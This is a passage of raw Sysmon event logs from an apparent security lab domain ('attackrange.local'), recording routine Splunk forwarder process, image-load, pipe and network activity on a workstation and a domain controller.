Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219218Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.264{AD5E2759-5ACC-618E-FBCD-08000000F101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021219248Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.794{AD5E2759-5ACD-618E-FDCD-08000000F101}59804488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000021219247Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:56.588{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64298-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x800000000000000021219246Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.607{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5ACD-618E-FDCD-08000000F101}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219245Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.607{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219244Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.607{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219243Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.607{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219242Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.607{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219241Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.607{AD5E2759-5432-6143-0500-00000000F101}412528C:\Windows\system32\csrss.exe{AD5E2759-5ACD-618E-FDCD-08000000F101}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219240Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.607{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5ACD-618E-FDCD-08000000F101}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219239Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.592{AD5E2759-5ACD-618E-FDCD-08000000F101}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219238Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.388{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91F9345A27CFBC4E6B155530909B77C4,SHA256=7450275A394426191B48E4383A6BD7DA7D2D163ED6C957701C9DB47944DD26BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.847{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344215Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.847{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B813601EC4A74703D0BB2EE4611F54CF,SHA256=D0FADB6A183319E24930882A3A210812CA8EE4D5DB09B022717C33BB69263223falsetrue 734700x800000000000000057344214Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344213Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344212Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344211Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057344210Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344209Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057344208Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344207Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344206Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344205Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.810{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344204Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344203Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344202Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344201Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344200Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344199Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344198Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344197Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344196Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344195Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344194Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344193Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344192Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057344191Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344190Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344189Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344188Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344187Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344186Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.794{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 